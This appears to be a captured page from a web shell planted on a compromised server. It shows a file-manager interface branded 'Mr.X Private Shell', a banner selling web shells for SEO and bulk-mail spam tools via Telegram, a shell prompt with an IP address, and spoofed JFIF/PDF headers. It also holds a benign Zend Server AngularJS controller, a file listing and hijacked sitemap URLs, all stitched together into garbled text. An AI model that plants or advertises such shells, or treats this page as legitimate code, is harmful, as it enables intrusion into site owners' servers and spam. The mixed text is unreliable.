xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
zsApp.controller('VHostManageWizardController', ['$scope', '$rootScope', '$q', 'WebAPI', '$timeout', 'ngDialog', 'Upload', '$filter', '$http', 
	function($scope, $rootScope, $q, WebAPI, $timeout, ngDialog, Upload, $filter, $http) {
	
	$scope.wizard = {
		inProgress: false,
		
		// close the wizard (cancel)
		close: function() {
			ngDialog.close();
		},
		
		addLine: '',
		toPath: '',
		manageTemplate: '',
		
		webServerType: window.serverData['web-server-type'],
		
		// get "line" and "path" from the server
		getInstructions: function() {
			var promise = WebAPI({
				method: 'post',
				url: '/ZendServer/Api/vhostEnableDeployment',
				data: {
					vhost: $scope.ngDialogData.vhostId,
					applyImmediately: false,
				}
			});
			
			promise.then(function(res) {
				if (res.data.responseData && res.data.responseData.manageInfo && 
					res.data.responseData.manageInfo.addLine && res.data.responseData.manageInfo.toPath
				) {
					$scope.wizard.addLine = res.data.responseData.manageInfo.addLine;
					$scope.wizard.toPath = res.data.responseData.manageInfo.toPath;
				} else {
					// handle error
					handleAjaxError(res, 'Cannot get the required information');
				}
			}, function(res) {
                $scope.wizard.addLine = 'error';
                $scope.wizard.toPath = 'error';

				handleAjaxError(res, 'Cannot get the required information');
			});
			
			return promise;
		},
		
		getExampleVhost: function() {
			var promise = WebAPI({
				method: 'get',
				url: '/ZendServer/Api/vhostGetDefaultTemplate',
			});
			
			promise.then(function(res) {
				if (res.data.responseData && res.data.responseData.manageTemplate) {
					$scope.wizard.manageTemplate = res.data.responseData.manageTemplate;
				} else {
					handleAjaxError(res, 'Cannot get the manage example template');
				}
			}, function(res) {
				handleAjaxError(res, 'Cannot get the manage example template');
			});
			
			return promise;
		},
		
		submit: function() {
			$scope.wizard.inProgress = true;
			
			var promise = WebAPI({
				method: 'post',
				url: '/ZendServer/Api/vhostEnableDeployment',
				data: {
					vhost: $scope.ngDialogData.vhostId,
					applyImmediately: true
				}
			});
			
			promise.then(function(res) {
				document.fireEvent('toastNotification', {
					message: 'Deployment has been successfully enabled on the virtual host'
				});
				
				$scope.wizard.close();
			}, function(res) {
				handleAjaxError(res, 'Could not enable deployment on the virtual host');
			});
			
			promise.finally(function() {
				$scope.wizard.inProgress = false;
			});
			
			return promise;
		},
	};
	
	// initialize the wizard
	$scope.wizard.getInstructions(); 
	$scope.wizard.getExampleVhost();
	
}]);

Filemanager

Name Type Size Permission Actions
applications.js File 46.22 KB 0644
deployment-wizard.js File 25.47 KB 0644
libraries.js File 29.77 KB 0644
settings.js File 2.93 KB 0644
vhost-manage-wizard.js File 2.66 KB 0644
vhost-wizard.js File 14.49 KB 0644
vhost.js File 27.81 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml